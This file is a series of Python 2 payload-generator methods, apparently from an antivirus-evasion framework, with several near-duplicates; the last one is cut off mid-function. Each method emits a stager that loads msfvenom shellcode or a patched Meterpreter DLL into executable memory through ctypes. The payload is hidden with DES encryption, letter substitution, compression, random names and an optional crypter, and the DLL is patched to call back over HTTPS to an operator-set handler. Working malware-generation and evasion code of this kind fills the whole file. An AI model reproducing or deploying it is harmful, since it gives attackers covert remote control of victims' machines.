        string literals into the emitted source, so the encryption only hides the
        shellcode from static inspection of the bytes; it provides no secrecy
        against anyone holding the payload.  Decryption yields the escaped
        shellcode text, converted with the Python 2-only ``string_escape`` codec.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_pyherion`` is ``"y"``.
        """

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandDESKey = randomizer.randomString()
        RandDESPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()

        # Set IV Value and DES Key (8 bytes each; both are embedded in the payload)
        iv = randomizer.randomKey(8)
        DESKey = randomizer.randomKey(8)

        # Create DES Object and encrypt our payload (CFB: no block padding required)
        desmain = DES.new(DESKey, DES.MODE_CFB, iv)
        EncShellCode = desmain.encrypt(Shellcode)

        # Create Payload File
        PayloadCode = 'from Crypto.Cipher import DES\n'
        PayloadCode += 'import ctypes\n'
        # Key material is emitted in plaintext
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
        PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
        # Escaped so the raw ciphertext can live inside a '...' literal
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
            "string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        # NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # -1 == INFINITE; last emitted line carries no trailing newline
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
	def generate(self):
		"""Emit the minimal ctypes loader: put the shellcode in a string buffer and call it.

		The shellcode text is inserted verbatim into a ``"..."`` literal (so it
		must be escaped ``\\xNN`` text with no unescaped double quotes); the Python
		parser turns it into raw bytes when the payload loads.  The buffer is then
		cast to ``CFUNCTYPE(c_void_p)`` and invoked -- no VirtualAlloc or
		VirtualProtect, so execution relies on that heap memory being executable.
		Nothing is encoded or encrypted; the shellcode bytes are readable in the
		generated source.

		Returns:
			str: payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		RandShellcode = randomizer.randomString()
		RandReverseShell = randomizer.randomString()
		RandMemoryShell = randomizer.randomString()

		PayloadCode = 'from ctypes import *\n'
		PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
		PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
		# Treat the buffer as a void function pointer and call it
		PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
		PayloadCode += RandShellcode + '()'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
	def generate(self):
		"""Emit an unencoded ctypes VirtualAlloc/CreateThread loader for the shellcode.

		The text from ``self.shellcode.generate()`` goes verbatim inside a
		single-quoted literal, so it must be escaped ``\\xNN`` text with no
		unescaped quotes.  The shellcode is not obscured in any way in the
		produced source.

		Returns:
			str: payload source, wrapped by ``crypters.pyherion`` when
			``use_pyherion`` is ``"y"``.
		"""

		# Generate Shellcode Using msfvenom
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names
		ShellcodeVariableName = randomizer.randomString()
		RandPtr = randomizer.randomString()
		RandBuf = randomizer.randomString()
		RandHt = randomizer.randomString()

		# Create Payload code
		PayloadCode = 'import ctypes\n'
		# The parser resolves the escapes when the payload loads
		PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
		# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX allocation)
		PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
		PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
		PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
		# NOTE(review): address and handle pass through 32-bit c_int -- assumes a 32-bit interpreter
		PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
		# -1 == INFINITE
		PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

		if self.required_options["use_pyherion"][0].lower() == "y":
			PayloadCode = crypters.pyherion(PayloadCode)

		return PayloadCode
    def generate(self):
        """Build Python 2 source that loads a patched Metasploit ``metsrv.dll`` in-process.

        Reads ``metsrv.dll`` from ``veil.METASPLOIT_PATH``, overwrites several
        placeholders inside it in place (a bootstrap stub over the MZ header, the
        user agent, the transport marker, the handler URL and two timeouts), then
        raw-deflates and base64-encodes the result into the emitted source.  The
        stub inflates it and calls the buffer through ``CFUNCTYPE(c_void_p)`` with
        no page-protection change.

        Every placeholder is located with ``str.index``, which raises ``ValueError``
        when a marker is absent, so this generator is tied to the ``metsrv.dll``
        layout of a particular Metasploit release.  The user agent and handler URL
        end up inside the deflated blob rather than as plaintext in the source.

        Returns:
            str: payload source, wrapped by ``crypters.pyherion`` when
            ``use_encrypter`` is ``"y"``.

        Raises:
            IOError: if ``metsrv.dll`` cannot be opened.
            ValueError: if any placeholder is not found in the DLL.
        """

        metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

        # NOTE(review): the handle is not closed if read() raises; a with-block is the usual fix
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()

        # lambda function used for patching metsrv.dll: overwrites len(s) bytes at ind in place.
        # Total length is preserved, but nothing checks that s fits inside the placeholder it targets.
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]

        # patch the metsrv.dll header: keeps the "MZ" signature and drops a small bootstrap over the
        # bytes that follow.  The immediate on the first line (0x1537 here) differs between variants
        # of this stub, so it is presumably a DLL-specific offset -- confirm against the target build.

        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
        headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string (fixed value: a static network indicator)
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,
                                    userAgentString)

        # select the HTTPS transport by overwriting the SSL marker
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler; the placeholder is 8 + 256 bytes, and the
        # operator-supplied LHOST is inserted unchecked -- it must fit and be URL-safe
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
            self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
            ) + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration timeout sentinel with 604800 (7 days), little-endian uint32
        # (the sentinel value is presumably what Metasploit leaves in the binary for patching)
        expirationTimeoutIndex = meterpreterDll.index(
            struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,
                                    expirationTimeout)

        # replace the communication timeout sentinel with 300 seconds, little-endian uint32
        communicationTimeoutIndex = meterpreterDll.index(
            struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,
                                    communicationTimeout)

        # compress/base64 encode the dll (helpers.deflate is defined elsewhere; the stub's
        # zlib.decompress(..., -15) expects a raw deflate stream in base64)
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # doing void * cast
        payloadCode += "from ctypes import *\nimport base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()

        # inflate function: base64 -> raw-deflate decompress (wbits -15 == no zlib header)
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
        payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

        # randVarName is deliberately re-drawn here: the first name is local to the emitted function
        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()

        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        # Call the inflated DLL image directly as a function pointer (no VirtualAlloc/VirtualProtect)
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName + "()\n"

        # Note the option name differs from the other generators' "use_pyherion"
        if self.required_options["use_encrypter"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
            
        f = open(metsrvPath, 'rb')
        meterpreterDll = f.read()
        f.close()
        
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        
        # actually build out the payload
        payloadCode = ""
        
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()
            
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection
        else:

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
	def generate(self):
		"""Build the Python stager source for this payload and return it as a str.

		The msfvenom shellcode is string_escape'd and one hex letter (a-f) in the
		escaped text is swapped for a non-hex letter before it is embedded; the
		generated script rebuilds the inverse maketrans table, undoes the swap,
		decodes the escapes and executes the buffer through ctypes.  Both letters
		and the mapping are written into the output in cleartext, so this is a
		cosmetic transform of the on-disk bytes, not encryption.  The execution
		path is chosen by required_options["inject_method"]; "y" in
		required_options["use_pyherion"] wraps the result in crypters.pyherion.
		Python 2 only (string.maketrans, the "string_escape" codec).
		"""
		# Random letter substitution variables
		hex_letters = "abcdef"
		# 'x' is absent from this set, presumably so the "\x" escape prefix
		# produced by string_escape below survives the swap -- confirm.
		non_hex_letters = "ghijklmnopqrstuvwyz"
		encode_with_this = random.choice(hex_letters)
		decode_with_this = random.choice(non_hex_letters)

		# Generate Shellcode Using msfvenom (self.shellcode is configured elsewhere)
		Shellcode = self.shellcode.generate()

		# Generate Random Variable Names for the emitted script
		# (randomizer.randomString is provided by the surrounding project)
		subbed_shellcode_variable_name = randomizer.randomString()
		shellcode_variable_name = randomizer.randomString()
		rand_ptr = randomizer.randomString()
		rand_buf = randomizer.randomString()
		rand_ht = randomizer.randomString()
		rand_decoded_letter = randomizer.randomString()
		rand_correct_letter = randomizer.randomString()
		rand_sub_scheme = randomizer.randomString()

		# Create Letter Substitution Scheme: encode_with_this -> decode_with_this.
		# The generated script builds the reverse table (decode -> encode).
		sub_scheme = string.maketrans(encode_with_this, decode_with_this)

		# Escaping Shellcode so it can be embedded in a string literal
		Shellcode = Shellcode.encode("string_escape")

		if self.required_options["inject_method"][0].lower() == "virtual":

			# Create Payload File -- VirtualAlloc path.  The emitted script allocates
			# RWX memory (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
			# copies the decoded buffer in with RtlMoveMemory, starts a thread at it
			# and blocks in WaitForSingleObject(-1 = INFINITE).  An RWX private
			# allocation followed by a thread start at that address inside the
			# interpreter process is the observable a defender can alert on.
			payload_code = 'import ctypes\n'
			payload_code += 'from string import maketrans\n'
			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			# the swap is applied here, at generation time; the script reverses it
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			# bytearray gives from_buffer() the writable buffer it requires
			payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
			payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
			payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
			payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
			payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
			payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

			# optional wrapping by the project's pyherion crypter (defined elsewhere)
			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)
			
			return payload_code

		else:
			
			# Additional random variable names
			# NOTE(review): rand_reverse_shell is assigned but never used.
			rand_reverse_shell = randomizer.randomString()
			rand_memory_shell = randomizer.randomString()
			rand_shellcode = randomizer.randomString()

			# Create Payload File -- any inject_method other than "virtual" lands
			# here: the decoded bytes go into a ctypes string buffer that is cast to
			# a CFUNCTYPE(c_void_p) and called directly on the current thread.
			payload_code = 'from ctypes import *\n'
			payload_code += 'from string import maketrans\n'
			payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
			payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
			payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
			payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
			payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
			payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
			# note: no trailing newline on the last emitted line, unlike the branch above
			payload_code += rand_shellcode + '()'
    
			if self.required_options["use_pyherion"][0].lower() == "y":
				payload_code = crypters.pyherion(payload_code)

			return payload_code
    def generate(self):
        """Build a Python stager that embeds a patched metsrv DLL and return its source.

        The DLL is read from the Metasploit install, patched in place (header
        stub, User-Agent, transport name, handler URL, two timeouts), compressed
        and base64-encoded by helpers.deflate, and written into a generated
        script that inflates it at run time and executes it through ctypes.
        required_options["inject_method"] selects the execution path and
        required_options["use_pyherion"] == "y" wraps the result in
        crypters.pyherion.  Python 2 only: the DLL image is handled as a str.

        Raises:
            IOError: if the chosen metsrv path cannot be opened.
            ValueError: from str.index if any patch marker is missing from the DLL.
        """

        # prefer the explicitly x86 build of metsrv when the installed Metasploit ships one
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

        # NOTE(review): open/read/close without try/finally -- a with-block would
        # release the handle if read() raised.
        f = open(metsrvPath, "rb")
        meterpreterDll = f.read()
        f.close()

        # lambda function used for patching the metsvc.dll: overwrite len(s) bytes
        # of dll starting at ind.  No bounds check; if ind + len(s) runs past the
        # end, the result is simply dll[:ind] + s.
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

        # patch the metsrv.dll header: the first 48 bytes of the image (starting
        # at the "MZ" signature, \x4d\x5a) are replaced with this hard-coded
        # stub.  What the stub does is not documented here.
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
        headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string.  This value is constant across
        # every payload this module produces, which makes it a stable network
        # signature for defenders.
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

        # select the transport.  NOTE(review): the original comment said "turn off
        # SSL", but the marker is overwritten with the HTTPS transport name and the
        # URL below is https://.  The replacement is also 3 bytes longer than the
        # 25-byte token searched for, so it overwrites the 3 bytes that follow the
        # token -- presumably padding in the DLL, but verify against its layout.
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler.  The DLL carries a 264-byte
        # placeholder ("https://" + 256 X's); the assembled string is written over
        # its start and NUL-terminated, leaving the remaining X's in place.  Nothing
        # checks that urlString fits inside the placeholder.
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = (
            "https://"
            + self.required_options["LHOST"][0]
            + ":"
            + str(self.required_options["LPORT"][0])
            + "/"
            + self.genHTTPChecksum()  # defined elsewhere on this class
            + "_"
            + randomizer.randomString(16)  # per-payload random URI segment
            + "/\x00"
        )
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration-timeout marker (0xB64BE661) with 604800 seconds
        # (7 days).  NOTE(review): the original comment claimed 300; the value
        # actually written is 604800.
        expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
        expirationTimeout = struct.pack("<I", 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

        # replace the communication-timeout marker (0xAF79257F) with 300 seconds
        communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
        communicationTimeout = struct.pack("<I", 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

        # compress/base64 encode the dll.  helpers.deflate is defined elsewhere;
        # judging by the inflate routine emitted below (base64 decode, then
        # zlib.decompress with wbits=-15) it returns base64 text of a raw-deflate
        # stream -- confirm.
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast: the emitted script inflates the DLL into a str,
            # casts that buffer to a CFUNCTYPE(c_void_p) and calls it on the
            # current thread.
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()

            # deflate function (emitted inflate helper): base64 decode, then raw
            # inflate -- wbits -15 means no zlib header/trailer.
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            # re-drawn so the module-level name differs from the one used inside the helper
            randVarName = randomizer.randomString()
            randFuncName = randomizer.randomString()

            payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName + "()\n"

        # VirtualAlloc() injection -- taken for any inject_method other than "void"
        else:

            # The emitted script allocates RWX memory (0x3000 = MEM_COMMIT|MEM_RESERVE,
            # 0x40 = PAGE_EXECUTE_READWRITE), copies the inflated DLL in with
            # RtlMoveMemory, starts a thread at it and blocks in
            # WaitForSingleObject(-1 = INFINITE).  An RWX private allocation
            # followed by a thread start at that address inside the interpreter
            # process is the observable a defender can alert on.
            payloadCode += "import ctypes,base64,zlib\n"

            randInflateFuncName = randomizer.randomString()
            randb64stringName = randomizer.randomString()
            randVarName = randomizer.randomString()
            randPtr = randomizer.randomString()
            randBuf = randomizer.randomString()
            randHt = randomizer.randomString()

            # deflate function (emitted inflate helper, same shape as the "void" path)
            payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
            payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

            # bytearray gives from_buffer() the writable buffer it requires.  Note
            # that randVarName is NOT re-drawn here, so the module-level variable
            # shares its name with the helper's local.
            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
            payloadCode += (
                randPtr
                + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                + randVarName
                + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
            )
            payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
            payloadCode += (
                "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                + randPtr
                + "),"
                + randBuf
                + ",ctypes.c_int(len("
                + randVarName
                + ")))\n"
            )
            payloadCode += (
                randHt
                + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                + randPtr
                + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
            )
            payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"

        # optional wrapping by the project's pyherion crypter (defined elsewhere)
        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = crypters.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        """Build the Python stager source for this payload and return it as a str.

        The msfvenom shellcode is string_escape'd and one hex letter (a-f) in the
        escaped text is swapped for a non-hex letter before it is embedded; the
        generated script rebuilds the inverse maketrans table, undoes the swap,
        decodes the escapes and executes the buffer through ctypes.  Both letters
        and the mapping are written into the output in cleartext, so this is a
        cosmetic transform of the on-disk bytes, not encryption.  The execution
        path is chosen by required_options["inject_method"]; "y" in
        required_options["use_pyherion"] wraps the result in crypters.pyherion.
        Python 2 only (string.maketrans, the "string_escape" codec).
        """
        # Random letter substitution variables
        hex_letters = "abcdef"
        # 'x' is absent from this set, presumably so the "\x" escape prefix
        # produced by string_escape below survives the swap -- confirm.
        non_hex_letters = "ghijklmnopqrstuvwyz"
        encode_with_this = random.choice(hex_letters)
        decode_with_this = random.choice(non_hex_letters)

        # Generate Shellcode Using msfvenom (self.shellcode is configured elsewhere)
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names for the emitted script
        # (randomizer.randomString is provided by the surrounding project)
        subbed_shellcode_variable_name = randomizer.randomString()
        shellcode_variable_name = randomizer.randomString()
